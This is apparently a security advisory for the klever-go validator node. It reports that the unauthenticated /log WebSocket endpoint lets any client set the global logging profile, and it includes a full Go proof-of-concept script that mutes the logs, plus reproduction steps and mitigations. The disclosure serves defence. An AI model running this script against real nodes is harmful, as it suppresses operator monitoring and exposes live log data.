An unauthenticated client can connect to GET /log, send an arbitrary logger profile as the first WebSocket message, and mutate the node's global logging configuration before receiving live logs from the process. I confirmed this against a local validator built from this repository: an unauthenticated client set the global log level to *:NONE, the node accepted the profile, and the node stopped emitting normal slot logs while the WebSocket connection remained open.
This is not a duplicate of the published KVM or P2P advisories. It is a management-plane flaw in the public WebSocket logging endpoint.
config/node/api.yamlnetwork/api/api.gonetwork/api/api.gonetwork/api/logs/logSender.gogithub.com/klever-io/klever-go-logger, profile.go, Apply()/log is enabled by default and does not require authentication. After the WebSocket upgrade, the server reads the first client message and treats it as a logger Profile. That profile is then applied process-wide through profile.Apply(), which changes global log level patterns and output formatting options for the whole node.
After that handshake, the same unauthenticated connection is registered as a log observer and receives live logs from the running process.
9640d63265e910e166dfa694c8e5ddeb53018ffdcd <repo-root>
go build -o ./bin/validator ./cmd/node
./bin/validator \
--rest-api-interface=127.0.0.1:18080 \
--port=18083 \
--config=./config/node/config.yaml \
--config-api=./config/node/api.yaml \
--config-epochs=./config/node/enableEpochs.yaml \
--config-gas-schedule=./config/node/gasScheduleV1.yaml \
--config-external=./config/node/external.yaml \
--genesis-file=./config/node/genesis.json \
--nodes-setup-file=./config/node/nodesSetup.json \
--working-directory=./validator-report-run \
--use-log-view
The node exposes GET /log and a plain HTTP request already shows it is a live WebSocket endpoint:
curl -i http://127.0.0.1:18080/log
Observed response:
HTTP/1.1 400 Bad Request
Sec-Websocket-Version: 13
Before the attack, the validator emits periodic slot logs such as:
#################################### SLOT 14 BEGINS ####################################
#################################### SLOT 15 BEGINS ####################################
/log without authentication and apply a global mute profileRun the PoC file:
cd <repo-root>
go run ./poc-log-profile-control.go \
-url ws://127.0.0.1:18080/log \
-profile none \
-hold 12s
Full PoC source:
package main
import (
"flag"
"fmt"
"log"
"time"
"github.com/gorilla/websocket"
)
func main() {
url := flag.String("url", "ws://127.0.0.1:18080/log", "WebSocket log endpoint")
profile := flag.String("profile", "none", "Profile to send: none or trace")
hold := flag.Duration("hold", 12*time.Second, "How long to keep the socket open")
flag.Parse()
payload := `{"LogLevelPatterns":"*:NONE","WithCorrelation":false,"WithLoggerName":false}`
switch *profile {
case "trace":
payload = `{"LogLevelPatterns":"*:TRACE","WithCorrelation":true,"WithLoggerName":true}`
case "none":
default:
log.Fatalf("unsupported profile %q", *profile)
}
c, _, err := websocket.DefaultDialer.Dial(*url, nil)
if err != nil {
log.Fatalf("dial: %v", err)
}
defer c.Close()
fmt.Printf("connected to %s\n", *url)
fmt.Printf("sending payload: %s\n", payload)
if err := c.WriteMessage(websocket.TextMessage, []byte(payload)); err != nil {
log.Fatalf("write payload: %v", err)
}
fmt.Printf("holding connection open for %s\n", hold.String())
time.Sleep(*hold)
fmt.Println("closing connection")
}
Save the PoC as poc-log-profile-control.go in the repository root, or run it from any directory with access to the Go module cache.
While the PoC is connected, the validator prints:
websocket log profile received profile = [pattern=*:NONE, with correlation=false, with logger name=false]
In my local reproduction, the validator emitted:
SLOT 14 BEGINS
websocket log profile received profile = [pattern=*:NONE, ...]
reverted log profile profile = [pattern=*:INFO, ...]
SLOT 18 BEGINS
The expected slot logs for the interval while *:NONE was active did not appear. This proves that an unauthenticated client can suppress process logs globally while the WebSocket remains connected.
After the PoC closes the WebSocket, the validator prints:
reverted log profile profile = [pattern=*:INFO, with correlation=false, with logger name=false]
The revert happens because the server stores the previous profile and restores it only on disconnect. During the lifetime of the attacker connection, the attacker-controlled profile remains active.
An unauthenticated attacker can:
/log*:NONE*:TRACE and force noisy loggingThis affects both confidentiality and operational integrity.
In the reproduced case, the attacker hid normal validator slot logs for multiple slot intervals. In real deployments, logs commonly contain operational details, peer information, error traces, and occasionally secrets or credentials emitted by adjacent components. Even when no secrets are present, the ability to suppress or distort logs from the public network is a meaningful security impact because it degrades detection, incident response, and operator visibility while an attacker is active.
This issue is distinct from:
GHSA-jc6w-wmfc-fh33 (KVM read-only execution side effects)GHSA-87m7-qffr-542v (MultiDataInterceptor remote OOM)GHSA-74m6-4hjp-7226 (MultiDataInterceptor throttler slot leak)Those are VM/P2P-path flaws. This finding is an unauthenticated management-plane flaw in the WebSocket logging endpoint.
/log from the default open: true route set./log to localhost-only or a dedicated admin interface.{
"cwe_ids": [
"CWE-200",
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-23T19:13:46Z",
"nvd_published_at": null,
"severity": "HIGH"
}